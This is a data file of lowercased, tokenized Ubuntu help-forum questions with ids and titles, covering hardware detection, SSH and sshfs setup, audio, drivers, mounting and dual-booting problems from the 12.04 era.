181682	which version of ubuntu should i install on an old pc ?	i just inherited from my neighbors an old pc with windows xp as the operating system would try to use it with ubuntu but i 'm undecided on the version to install , the two versions that excite me the most are : kubuntu and lubuntu . what do you advise me to install ? thanks in advance
181692	is there any difference between processor and core ?	the following two command seems to give me different information about the same hardware srs @ ubuntu : ~ $ cat /proc/cpuinfo | grep -e processor -e cores processor : 0 cpu cores : 4 processor : 1 cpu cores : 4 processor : 2 cpu cores : 4 processor : 3 cpu cores : 4 srs @ ubuntu : ~ $ sudo dmidecode -t processor # dmidecode 2.9 smbios 2.6 present . handle 0x0004 , dmi type 4 , 42 bytes processor information socket designation : lga1155 type : central processor family : < out of spec > manufacturer : intel id : a7 06 02 00 ff fb eb bf version : intel ( r ) core ( tm ) i5-2500k cpu @ 3.30ghz voltage : 1.0 v external clock : 100 mhz max speed : 3800 mhz current speed : 3300 mhz status : populated , enabled upgrade : other l1 cache handle : 0x0005 l2 cache handle : 0x0006 l3 cache handle : 0x0007 serial number : to be filled by o.e.m . asset tag : to be filled by o.e.m . part number : to be filled by o.e.m . core count : 4 core enabled : 1 characteristics : 64-bit capable until today i thought i had a single processor with 4 independent cores . i also thought that within each core can be used different threads . mitch has given to the way to find out that i have got the single socket quad core ( example 3 ) : srs @ ubuntu : ~ $ cat /proc/cpuinfo | grep -e processor -e `` model name '' -e `` cache size '' -e `` physical id '' -e `` siblings '' -e `` core id '' -e `` cpu cores '' processor : 0 model name : intel ( r ) core ( tm ) i5-2500k cpu @ 3.30ghz cache size : 6144 kb physical id : 0 siblings : 4 core id : 0 cpu cores : 4 processor : 1 model name : intel ( r ) core ( tm ) i5-2500k cpu @ 3.30ghz cache size : 6144 kb physical id : 0 siblings : 4 core id : 1 cpu cores : 4 processor : 2 model name : intel ( r ) core ( tm ) i5-2500k cpu @ 3.30ghz cache size : 6144 kb physical id : 0 siblings : 4 core id : 2 cpu cores : 4 processor : 3 model name : intel ( r ) core ( tm ) i5-2500k cpu @ 3.30ghz cache size : 6144 kb physical id : 0 siblings : 4 core id : 3 cpu cores : 4 now i can understand that there are much more different kinds of processors that i never thought . thanks
181694	replacing lf , nel line endings in text file with cr+lf	i have a text file with a strange character encoding that i 'd like to convert to standard utf-8 . i have managed to get part of the way : $ file myfile.txt myfile.txt : non-iso extended-ascii text , with lf , nel line endings $ iconv -f ascii -t utf-8 myfile.txt > myfile.txt.utf8 $ file myfile.txt.utf8 myfile.txt.utf8 : utf-8 unicode text , with lf , nel line endings # # edit myfile.txt.utf8 using nano , to fix failed character conversions ( mostly åäö ) $ file myfile.txt.utf8 myfile.txt.utf8 : utf-8 unicode text , with lf , nel line endings however , i ca n't figure out how to convert the line endings . how do i do to replace lf+nel with cr+lf ( or whatever is the standard ) ? when i 'm done , i 'd like to see the following : $ file myfile.txt myfile.txt : utf-8 unicode text
181696	how can i switch memory modules to 1600 mhz ?	some months ago i bought 4 memory modules of 4gb ddr3 1600 kingston hyperx . the official kingston manual says : *this module has been tested to run at ddr3-1600 at a low latency timing of 9-9-9-27 at 1.65v.the spd is programmed to jedec standard latency ddr3-1333 timing of 9-9-9 . i can not find which is the real speed of my memory modules . i normally get from several tools that the real speed is 1333 mhz srs @ ubuntu : ~ $ sudo dmidecode -t memory # dmidecode 2.9 smbios 2.6 present . handle 0x005d , dmi type 16 , 15 bytes physical memory array location : system board or motherboard use : system memory error correction type : none maximum capacity : 32 gb error information handle : 0x005f number of devices : 4 handle 0x005c , dmi type 17 , 28 bytes memory device array handle : 0x005d error information handle : 0x0060 total width : 64 bits data width : 64 bits size : 4096 mb form factor : dimm set : none locator : channela-dimm0 bank locator : bank 0 type : < out of spec > type detail : synchronous speed : 1333 mhz ( 0.8 ns ) manufacturer : kingston serial number : 07288f23 asset tag : 9876543210 part number : 9905403-439.a00lf how can i switch memory modules to 1600 mhz ?
181699	how can i change a folder 's icon by using a script ?	i have in my profile folder `` home '' some specials folders as `` wallpapers '' , `` txt '' , etc . and i use , for those personalized icons . the problem is that , any time i reinstall ubuntu , i have to assign again the icon to that particular folder , and with the years and the installs , the number of folders are increasing . so i need a automatic way to assign those custom icons to those special folders . is there a way to do that ? i hope somebody can help me .
181701	remove or disable java due to the security issue	according to the news there 's java security hole that is still not fixed . how can ubuntu users protect their pc ? i 've got gnome-shell installed and as far as i understand it depends on java . which packages should i remove ? there 's a guide for mac users at mozilla 's site , but not for linux . how to turn off java applets
181702	how to start image viewer in front ?	i use image viewer on the gnome shell . yet when i am in file manager and open an image , the image opens in the background . how to start in front of everything else ?
181704	play sound from different applications on different output devices ( speakers , headphones )	i want music ( played e.g . via audacious ) to be played on speaker system , and all other sounds produced by other applications ( including ubuntu sound effects ) to be played on headphones . my computer has sound connectors at its back , and also connectors on its front panel . when i connect both headphones and speakers , only headphones work ( i take it , the front connectors take precedence ? ) . should i purchase another sound card ( in addition to the motherboard-integrated sound i have ) ? when i go to audacious output settings , i see only the ouput plugin selection list , with pulseaudio selected and options like alsa , oss4 etc . but there 's no facility to select particular output device ( and i guess it would n't magically appear even if i had the second soundcard ) . is this at all possible to bind specific application to particular output device ?
181709	what music player for ubuntu is *most* like cog ?	cog is , far and away , my favourite music player . file browser on the left panel , pull a folder into the right panel , it plays the files you pull into the main box . simple ! easy ! nice ! especially since i store all my music on my non-primary drive . cog does n't care where i keep my music ! it just deals with whatever folder i tell it to monitor . i also have about 200 gigs of music . it 's a problem , i know . i ca n't find a player this simple and elegant in ubuntu . amarok : does n't handle non-primary drives very well . banshee : kinda good , but fussy browsing/playlist systems . audacious : no file browser ; it also crashes whenever i try to `` import '' all my music . all i want -- seriously -- is something where i can look at my mp3 folder , drag a folder onto a playlist , and have that playlist play the songs .
181712	how to get soci.h ?	i am using ubuntu 12.04 , and i compiled a package for object recognition ( rein ) .i got an error indicating that i do n't have soci.h : error : can not find soci header file : soci.h i tried to use this command to install libsoci sudo apt-get install libsoci-core-gcc but i get the message : e : ca n't find package libsoci-core-gcc does anybody know how to install this library ? thanks ! p.s.for more detailed information , click here .
181715	compiz crashes on 12.04	i have ubuntu 64bit installed with the nvidia propriety driver installed and also updated from the ppa : ubuntu-x-swat/x-updates . currently i believe i am running 302.11 nvidia driver however , when moving windows about or using the hud interface / search interface my screen will freeze for ~20 seconds everything will flicker and then i am presented with a compiz crash . this happens regularly and sometimes compiz does not resume for a couple of minutes . are there any logs i can gather to help ?
181717	native aaa games coming to ubuntu . where they will be installed ?	many users use ssd disks ( and i believe many more in the future ) for their os . 128gb ssd disks are common place nowadays and many users ( like me ) use their ssd for dual booting ( windows and ubuntu ) . ubuntu installations like this occupies 20-40 gb ( / , /home and swap ) . up to now there was no problem . in a few weeks though , triple a games are coming to ubuntu ( i.e . l4d2 ) that require probably tens of gb for installation . in windows there is no problem , because you can install a game anywhere you want ( i.e . i install games in d : /games/ ) . in ubuntu , though , programs install files in many places ( i.e . /usr/* , /lib , /etc ) so from what i remember , i never had the option to choose where to install a program . so , how will it be possible to install aaa games that require many gbs , when our ubuntu installations wo n't have the necessary space ? could a /opt mounted on a mechanical disk ( hdd ) be the solution ? is it something i am missing ?
181721	( vrml ) files , how to render	how can i render ( vrml ) files . from here http : //csi.chemie.tu-darmstadt.de/ak/immel/script/redirect.cgi ? filename=http : //csi.chemie.tu-darmstadt.de/ak/immel/tutorials/orbitals/vrml.html http : //csi.chemie.tu-darmstadt.de/ak/immel/tutorials/orbitals/vrml/1s.wrl i am unable to play these file in chrome current version , ubuntu 12.04 . also , is there any way to get these models to work in any 3d molecule viewer .
181723	connecting to ubuntu server via ssh externally	i have recently installed ubuntu server ( 12.0.4 ) and intend to use it primarily as a file server . i am completely new to linux so this is a pretty big learning curve . yesterday i was able to configure putty on my windows 7 machine using an ssh key pair so that i can administer ubuntu server from my desktop . this works fine provided that both machines are on the same network . in the case of my laptop ( macbook air ) it might not always be on the same network , is it possible to be able to connect to the ubuntu server from my laptop via ssh when it is on a different network ? i have installed avahi daemon so that the hostname for the server is broadcast on the lan and configured the router so that it will always assign the same ip to the server . apart from that the only thing i have installed on the server is openssh where i have disabled password authentication so that you can only connect using a key pair . i thought i would be able to do something like this from the terminal on my laptop : ssh my.external.ip.address user @ hostname.local when i try that command i get the following error : ssh : connect to host my.external.ip.address port 22 : operation timed out i have also tried ssh my.external.ip.address user @ servers.local.ip.address and i get the same error message as before . so that should give you an idea of what i am trying to do but currently i do not know if this is possible and if it is how to do it . any instructions to configure this would be appreciated , thanks . edit : i should also add that assuming i can set up an external connection via ssh from my laptop , there is a possibility that my isp will change my external ip which would break the external connection . i would like to be able to connect robustly that is ; if my isp changes the external ip i would still be able to connect remotely to the server without having to know what the new external ip address is .
181729	how do i set up multiple hdd ?	i got some new hard discs and would like to set my pc up in the following way : ubuntu is currently installed on one drive i want to put windows on a second drive i would like a third drive for shared content ( music and stuff ) that both oses can access what i need to know is what format should the content drive be ? how should i configure the drive order in my bios for grub to be boot manager and how to configure grub for multi-hdd booting ?
181730	how to download torrents with long filenames ?	there is a known problem with transmission : it ca n't download torrents with filenames longer than 255 bytes . what are the workarounds ?
181735	how to boot up in kubuntu-mobile ?	on ubuntu 12.04 unity i just did sudo apt-get install kubuntu-full kubuntu-mobile plasma-mobile the install finished with no problems and i see kubuntu in lightdm as an option to boot into ... but i am not seeing a kubuntu-mobile option ? how do i boot into kubuntu-mobile and get the plasma mobile interface ?
181737	cracking sound whenever i play a song	i successfully installed 12.04 on my computer which also has windows 7 . all works fine other than the songs that i try to play . whether it be through vlc , rhythmbox or audacious player , i get a cracking sound whenever i play songs , it stops for a few seconds , skips a few parts and altogether its a terrible experience for the ears . on the terminal , i wrote sudo lspci -v as given in the `` help '' , and below is the result i got : ananyabrata @ ananyabrata-desktop : ~ $ sudo lspci -v [ sudo ] password for ananyabrata : 00:00.0 host bridge : intel corporation 4 series chipset dram controller ( rev 03 ) subsystem : intel corporation device 5756 flags : bus master , fast devsel , latency 0 capabilities : [ e0 ] vendor specific information : len=0c < ? > kernel driver in use : agpgart-intel 00:01.0 pci bridge : intel corporation 4 series chipset pci express root port ( rev 03 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 capabilities : [ 88 ] subsystem : intel corporation device 5756 capabilities : [ 80 ] power management version 3 capabilities : [ 90 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ a0 ] express root port ( slot+ ) , msi 00 capabilities : [ 100 ] virtual channel capabilities : [ 140 ] root complex link kernel driver in use : pcieport kernel modules : shpchp 00:02.0 vga compatible controller : intel corporation 4 series chipset integrated graphics controller ( rev 03 ) ( prog-if 00 [ vga controller ] ) subsystem : intel corporation device 5756 flags : bus master , fast devsel , latency 0 , irq 44 memory at e0000000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at f0f0 [ size=8 ] expansion rom at < unassigned > [ disabled ] capabilities : [ 90 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ d0 ] power management version 2 kernel driver in use : i915 kernel modules : i915 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 01 ) subsystem : intel corporation device 5756 flags : bus master , fast devsel , latency 0 , irq 45 memory at e0500000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 50 ] power management version 2 capabilities : [ 60 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 70 ] express root complex integrated endpoint , msi 00 capabilities : [ 100 ] virtual channel capabilities : [ 130 ] root complex link kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 01 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 i/o behind bridge : 00001000-00001fff memory behind bridge : 80200000-803fffff prefetchable memory behind bridge : 0000000080400000-00000000805fffff capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ 90 ] subsystem : intel corporation device 5756 capabilities : [ a0 ] power management version 2 capabilities : [ 100 ] virtual channel capabilities : [ 180 ] root complex link kernel driver in use : pcieport kernel modules : shpchp 00:1c.1 pci bridge : intel corporation n10/ich 7 family pci express port 2 ( rev 01 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 i/o behind bridge : 0000e000-0000efff memory behind bridge : e0400000-e04fffff prefetchable memory behind bridge : 0000000080000000-00000000801fffff capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ 90 ] subsystem : intel corporation device 5756 capabilities : [ a0 ] power management version 2 capabilities : [ 100 ] virtual channel capabilities : [ 180 ] root complex link kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 01 ) ( prog-if 00 [ uhci ] ) subsystem : intel corporation device 5756 flags : bus master , medium devsel , latency 0 , irq 23 i/o ports at f080 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 01 ) ( prog-if 00 [ uhci ] ) subsystem : intel corporation device 5756 flags : bus master , medium devsel , latency 0 , irq 19 i/o ports at f060 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 01 ) ( prog-if 00 [ uhci ] ) subsystem : intel corporation device 5756 flags : bus master , medium devsel , latency 0 , irq 18 i/o ports at f040 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 01 ) ( prog-if 00 [ uhci ] ) subsystem : intel corporation device 5756 flags : bus master , medium devsel , latency 0 , irq 16 i/o ports at f020 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 01 ) ( prog-if 20 [ ehci ] ) subsystem : intel corporation device 5756 flags : bus master , medium devsel , latency 0 , irq 23 memory at e0504000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : [ 50 ] power management version 2 capabilities : [ 58 ] debug port : bar=1 offset=00a0 kernel driver in use : ehci_hcd 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev e1 ) ( prog-if 01 [ subtractive decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=04 , subordinate=04 , sec-latency=32 capabilities : [ 50 ] subsystem : intel corporation device 5756 00:1f.0 isa bridge : intel corporation 82801gb/gr ( ich7 family ) lpc interface bridge ( rev 01 ) subsystem : intel corporation device 5756 flags : bus master , medium devsel , latency 0 capabilities : [ e0 ] vendor specific information : len=0c < ? > kernel modules : leds-ss4200 , itco_wdt , intel-rng 00:1f.2 ide interface : intel corporation n10/ich7 family sata controller [ ide mode ] ( rev 01 ) ( prog-if 8f [ master secp seco prip prio ] ) subsystem : intel corporation device 5756 flags : bus master , 66mhz , medium devsel , latency 0 , irq 19 i/o ports at f0e0 [ size=8 ] i/o ports at f0d0 [ size=4 ] i/o ports at f0c0 [ size=8 ] i/o ports at f0b0 [ size=4 ] i/o ports at f0a0 [ size=16 ] capabilities : [ 70 ] power management version 2 kernel driver in use : ata_piix 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 01 ) subsystem : intel corporation device 5756 flags : medium devsel , irq 10 i/o ports at 0400 [ size=32 ] kernel modules : i2c-i801 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) subsystem : intel corporation device 5756 physical slot : 0-1 flags : bus master , fast devsel , latency 0 , irq 43 i/o ports at e000 [ size=256 ] memory at e0424000 ( 64-bit , prefetchable ) [ size=4k ] memory at e0420000 ( 64-bit , prefetchable ) [ size=16k ] expansion rom at e0400000 [ disabled ] [ size=128k ] capabilities : [ 40 ] power management version 3 capabilities : [ 50 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 70 ] express endpoint , msi 01 capabilities : [ ac ] msi-x : enable- count=4 masked- capabilities : [ cc ] vital product data capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] virtual channel capabilities : [ 160 ] device serial number 90-00-00-00-68-4c-e0-00 kernel driver in use : r8169 kernel modules : r8169 two peculiar things i noticed is that i can play the songs on windows properly and when i open youtube , i can watch the videos without any sound problems . please help me out cause i 'm at my wits end , i am not at all able to hear my favorite songs or watch movies and soaps .
181739	remote access via ssh with password	during my experiments with vps ( 11.10 x86 ) i meet some problem with remote access to my machine . after installing the system , i 'm able to login via putty from windows machine ( default account with root privileges ) with password . in next step i 've created new user : adduser gsa after that i 've tried to login via ssh : ssh gsa @ localhost and everything works correctly ( so password is correct ) . in situation when i 'm trying to access my machine as gsa user ( from putty @ windows ) i receive access denied . some extra info : ssh -vv gsa @ xxx.xxx.xxx.xxx . . debug2 : we did not send a packet , disable method debug1 : next authentication method : publickey debug1 : trying private key : /root/.ssh/id_rsa debug1 : trying private key : /root/.ssh/id_dsa debug1 : trying private key : /root/.ssh/id_ecdsa debug2 : we did not send a packet , disable method debug1 : next authentication method : password gsa @ 80.82.23.124 's password : debug2 : we sent a password packet , wait for reply debug1 : authentications that can continue : publickey , gssapi-with-mic , password permission denied , please try again . in /etc/ssh/sshd_config , i have placed : passwordauthentication yes allowusers gsa do you have any suggestions how can i resolve this problem ?
181742	how do i install ubuntu 12 on a 64bit pc with uefi and gpt ssd disk , with no current os ?	how do i install ubuntu 12 on a new 64bit pc which has uefi instead of bios and a gpt formatted ssd disk , with no current os ? i have already tried and although it seemed to install , it would not boot/startup . i have temporarily given up trying to install ubuntu and am using windows 7 , but i would far prefer ubuntu !
181743	running skyrim under separate x session ?	i am trying to run skyrim with wine under a separate x . it runs if i just launch it normally , but the performance is terrible so i 'd like to try running it under a separate x to improve performance . i run : export wineprefix= '' /home/john/.local/share/wineprefixes/steam '' cd `` /home/john/.local/share/wineprefixes/steam/drive_c/program files/steam/steamapps/common/skyrim '' xinit /usr/bin/wine tesv.exe -- :1 both monitors turn black for a few seconds , then kde comes back and i have the following in konsole : x.org x server 1.11.3 release date : 2011-12-16 x protocol version 11 , revision 0 build operating system : linux 2.6.42-26-generic x86_64 ubuntu current operating system : linux desktop-ubuntu 3.2.0-29-generic # 46-ubuntu smp fri jul 27 17:03:23 utc 2012 x86_64 kernel command line : boot_image=/boot/vmlinuz-3.2.0-29-generic root=uuid=a7ecd6aa-8336-41fa-8c35-44dbe80a5a41 ro quiet splash vt.handoff=7 build date : 04 august 2012 01:51:23am xorg-server 2:1.11.4-0ubuntu10.7 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.24.4 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.1.log '' , time : wed aug 29 06:01:44 2012 ( == ) using config file : `` /etc/x11/xorg.conf '' ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' ( ww ) fglrx : no matching device section for instance ( busid pci:0 @ 1:0:1 ) found warning : gnome-keyring : : could n't connect to : /tmp/keyring-prhsdm/pkcs11 : no such file or directory xinit : connection to x server lost xio : fatal io error 11 ( resource temporarily unavailable ) on x server `` :1 '' after 9 requests ( 7 known processed ) with 0 events remaining . waiting for x server to shut down xio : fatal io error 2 ( no such file or directory ) on x server `` :1 '' after 845 requests ( 826 known processed ) with 0 events remaining . ddxsiggiveup : closing log server terminated successfully ( 0 ) . closing log file . i am running ubuntu 12.4 and have a redeon hd 6850 with fglrx-updates installed . not sure what else is relevant , but i am happy to provide more information . what is causing this problem and what steps do i need to take to correct it ?
181747	how can i run a whois on an ip address ?	so i 'm looking at my sent traffic in iftop and i 'm connected to an ip i do n't recognise and i 'm sending quite a bit of traffic their way . i 'd like to work out where in the world this ip goes to . online i 've been running whois queries against ip addresses for a long time but i do n't think i 've ever been able to get it to work for ip addresses . is there some trick to making the whois command handle ips too ? here 's what i 'm doing : oli @ bert : ~ $ whois 224.0.0.251 no whois server is known for this kind of object .
181751	stream video from ubuntu server to android device	i have a ubuntu 12.04 headless server . i got alot of video on the server . most of it is in x264 in .mkv . i have a samsung nexus phone , and a nexus 7 tablet . whats my options when it comes to streaming from the ubuntu server to android ? i got smb up and running . some friends of mine was talking about dlna , the `` playstation media server '' could be a solution ?
181756	find command to remove files says that some files do n't exist	i have an osx mountain lion laptop connected to and ubuntu 11.10 system and tried to copy one .csv file from the osx machine to the ubuntu machine . i stopped the file transfer as i realised it created several empty files in the target folder . i now have a few hundred files sitting there which i cant delete using : sudo find . -name `` *.csv '' | xargs /bin/rm it is saying file does not exist ... . any ideas on that ?
181758	simple and easy way to permanently mount remote folder	we are planning to replace all our windows machine ( around 25 ) of php development team to ubuntu and we found everything perfect here however , we have two major problems as we work in team , we do development on remote linux server and we need to access remote folder on local machine all major php editor does not allow to open file from bookmarked folder or remote folder mapped using connect to server options , it does not show at all . to solve this problem we are trying to map folders using sshfs and we used many ways but we are not able to permanently map the folder , every time we restart it looses the mount we also tried to use tutorial here http : //www.tjansson.dk/ ? p=84 this is working and creates a folder for mapping but it throws permission error and does not show any contents . we also tried to bookmark map using sshfs but bookmark does not work after reboot can any one suggest best and simple way to permanently mount the folder or better way to access remote folder ? or can anyone suggest best approach to do a php development with a team on remote linux server and client machine being ubuntu ?
181763	glippy stores clipboard but ca n't access it	after a few hours from the login , glippy stops working . it still receive input from the clipboard , storing everything highlighted or copied , but when i try to recover an older clipboard item by selecting it from the dropdown menu , it does n't work . i do n't know where to look for logs/debugging so if you have any suggestion on how to investigate further please comment and i 'll add more details to the question .
181774	black screen after instalation of kde desktop	i am using ubuntu 12.04 . i have installed kde-plasma-netbook for testing , but when i have selected that session from login screen , i hear the login sound but i got nothing on the desktop ( screen ) . it 's completely empty blank screen . help me to solve this . edit : here we go ! i can get alt+f2 launcher and i can launch dolphin or any application but my desktop is look like the image i am attaching now . any help appreciated , : )
181777	where are the cd label graphics and labels for the current release ?	did ubuntu provide any cd label pics for the current release ( 12.04 ) ? i 've looked all around in the livecd iso directories . i want to lightscribe something , for this live cd .
181778	problems with newly installed ubuntu	i just dual-booted my pc with ubuntu 12.04 alongside windows 7 . i like everything about ubuntu except two things . first , whenever i click the right mouse button in firefox , it immediately hangs . i have to kill the process then . it becomes very annoying when i have several tabs open and i forget not to use the right mouse button . i had previously booted ubuntu with unetbootin , the same problem was there even then . secondly , when i had not installed amd drivers on windows 7 , the laptop was just eating through the battery . only after installing the drivers , did it come to cool down and started giving the 6 hours backup it was supposed to . now , the problem is that in ubuntu , the laptop is just throwing up the heat as if i am playing some heavy game . it goes without saying that the battery backup is poor - barely 2 hours . is there any solution for this ? and make that questions three - is there any beginners guide to ubuntu ? i feel seriously confused when trying to install a software . in fact i have no idea how to do it . i know there is software center but i have no idea how to operate it . the last time i used a linux os was mint 8 few years back . at that time too , i felt seriously confused with all the commands you have to know about , in order to have any sense of control . my system is hp pavilion g6-2005ax , if that helps .
181781	run a ( single ) program as root	i have been given a tool that uses a closed source library to operate the hardware watchdog timer on my `` pc '' . the library insists on being run as root . i have tried modifying the sudoers file to allow admin to run the program with nopassword set and i tried this also with a new group . i also tried making the permission of the file rwsw-x -- . none of these worked or i just did them wrong . so , how can i mark a program to allow a simple user ( i.e . my userid ) to run with root privileges ? tnx .
181782	apple cloud replacement ?	i 'm looking to ditch the monster that is apple , can i run ubuntu and an android phone in similar format to macbook and ios ? namely , is there support to have calendars/contacts/bookmarks/reminders/photos etc ... all syncing over wifi between my handset and ubuntu ? big step so wan na be sure !
181800	how to mount usb to access files from terminal	i can access files from emplorer or nautilus but how to do the same job from terminal . how to mount usb to access files from terminal . and whats the complete process of doing it . this will be my first time of mounting
181802	what is the attribute used to display the username for lightdm ? is it something i can change ?	right now it looks like my username is being displayed based on the sn ldap attribute . i 'd prefer it to be displayname or gecos , is that something i can configure either via lightdm or ldap.conf ?
181813	are there any options in libre office to save files directly in google drive by default ?	are there any options in libreoffice to save files directly in google drive by default ? other than oog2google extension .
181815	how to disable qt accessibility in 12.04 ?	observed behavior when opening a kde session , a blue round icon with a human silhouette appears in tray . it offers `` enable screensaver '' `` speak text '' `` speak keyboard '' . it seems related to processes /usr/lib/kde4/libexec/kaccessibleapp and kaccess . i do n't really care . so far so good . context i 've hit a bug and reported it to kde . maintainer says : the backtrace also indicates , that you may be use qt with accessibility enabled . if this is the case , please ask in the forums of your distribution how to disable qt accessibility , and report back , if this fixes the issue . wished behavior i wish `` qt accessibility off '' . that may mean not having this applet running . solutions already tried looking in kde preference panel . there is an accessibility group ( visual bell , modifier keys , keyboard filter ) , seems unrelated to `` qt accessibility '' , does not mention the applet . googled , find various `` solutions '' for older kde , none worked . searched askubuntu . some questions on similar topics , not this one . tried brute force . if i kill processes containing the string `` kaccess '' , ( e.g . killall -v kaccessibleapp kaccess kglobalaccess ) it restarts right away . tried purging `` kaccessible '' package . even after all this , qt accessibility features are still enabled , according to valgrind log . conclusion how can i just disable qt accessibility features ? i do n't need them at all and they may be the cause of the first problem . thank you for helping the community .
181818	accessing github on ubuntu through squid proxy	i am not able to clone a particular github branch ! it shows following error when i try to do so . cloning into 'ws ' ... error : the requested url returned error : 407 while accessing https : //github.com/abcd/efg.git/info/refs fatal : http request failed please help ! !
181823	is it possible to get the old workspaceswitcher back in the top-panel ?	i just updated my ubuntu from 10.04 to 12.04 yesterday and so far i 'm very satisfied with it . there is only one thing which is still missing to get back just the same comfort as i had with the previous version . i work on 4 workspaces and would like to have the ability to switch from one to another by just one click . with gnome there was the possibility to add the workspace switcher to the top-panel next to the system tray and i could easily click on just the workspace i wanted to switch to . of course there i could switch by using the keyboard shortcuts , but i would like to use the mouse in addition . i do n't like using the switcher on the left side because it 's much slower . is it possible to get the old workplace switcher back in the panel at the top ?
181827	sony vaio wireless card not connecting intel 4965agn	i 'm running a sony vaio vgn-cr410e , and recently moved it to ubuntu from windows 7 . both my home and work networks ( which i maintain ) run wpa/wpa2-psk authentication for security . my wireless network card ( intel 4965agn ) will not connect to them unless i am in the same room ( kind of defeats the purpose of wireless ) . the pc is 4 years old and the routers are brand new ( last month or so ) . had no problems with it with win7 , but ubuntu just does n't like the networks . as an it manager , my laptop needs to work , so any help is appreciated . if this is a duplicate , please let me know of what . i 've spent hours searching and nothing has worked . thanks for your help . ( this is my first experience fully relying on ubuntu ) . i can see the networks and attempt connection , but it fails authentication . let me know of any code you need . iwconfig : lo no wireless extensions . wlan0 ieee 802.11abgn essid : off/any mode : managed access point : not-associated tx-power=off retry long limit:7 rts thr : off fragment thr : off power management : off eth0 no wireless extensions . modinfo iwl4965 : filename : /lib/modules/3.2.0-29-generic-pae/kernel/drivers/net/wireless/iwlegacy/iwl4965.ko firmware : iwlwifi-4965-2.ucode alias : iwl4965 license : gpl author : copyright ( c ) 2003-2011 intel corporation < ilw @ linux.intel.com > version : in-tree : description : intel ( r ) wireless wifi 4965 driver for linux srcversion : e3d7b995b1c47ae1cddea08 alias : pci : v00008086d00004230sv*sd*bc*sc*i* alias : pci : v00008086d00004229sv*sd*bc*sc*i* depends : iwl-legacy , cfg80211 , mac80211 intree : y vermagic : 3.2.0-29-generic-pae smp mod_unload modversions 686 parm : swcrypto : using crypto in software ( default 0 [ hardware ] ) ( int ) parm : queues_num : number of hw queues . ( int ) parm : 11n_disable : disable 11n functionality ( int ) parm : amsdu_size_8k : enable 8k amsdu size ( int ) parm : fw_restart : restart firmware in case of error ( int )
181829	how to fix 3d acceleration for vmware workstation 9 ?	i have recently installed vmware workstation 9 on ubuntu 12.04 & i have migrated my vm 's from windows to ubuntu 12.04 . now i am getting opengl error & it says no 3d acceleration as shown in pic below how do i fix it ?
181830	intallsing ubuntu 12.04 lts in acer aspire 4736z	my laptop is acer aspire 4736z and installed windows 7 ultimate . can i install ubuntu 12.04 lts alongside windows 7 in my laptop ? ? i have same problem with this case : no display when installing ubuntu on an acer 4736z
181834	install windows7 on drive with ubuntu 12.04 already on . is my plan good ?	i have ubuntu 12.04 working fine , but need windows occasionally . i just wanted to check that my plan for installing would work ? any help appreciated . current partitions are : partition ... . @ file system @ mount point @ size ... .. @ used ... .. @ flags /dev/sda1 ... . @ ext4 ... ... .. @ /ext4a ... ... @ 37 gib ... @ 776 mib.. @ boot /dev/sda2 ... . @ extended ... . @ ... ... ... ... . @ 122 gib.. @ - ... ... .. @ ./dev/sda5 ... @ ext4 ... ... .. @ / ... ... ... . @ 37 gib ... @ 6 gib ... . @ .unallocated @ unallocated @ ... ... ... ... . @ 7 gib ... . @ - ... ... @ ./dev/sda6 .. @ ext4 ... ... .. @ /home ... ... . @ 77 gib ... @ 32 gib ... @ .unallocated @ unallocated @ ... ... ... ... . @ 65 gib ... @ - ... ... . @ /dev/sda3 ... @ linux-swap.. @ ... ... ... ... . @ 7 gib ... . @ - ... ... . @ my plan is to : boot to ubuntu from usb iso change sda1 to ntfs install windows 7 to sda1 use the `` master boot record repair '' utility to configure dual boot so i can see my original ubuntu installation as well as w7 . have i missed something ? i 'm concerned as to what the 776mb is that will be overwritten by the change to ntfs . it seems large for just the mbr ? would also appreciate it if anyone can explain what sda5 and 6 are being used for ? is sda5 ubuntu and sda6 my data ? thanks in advance .
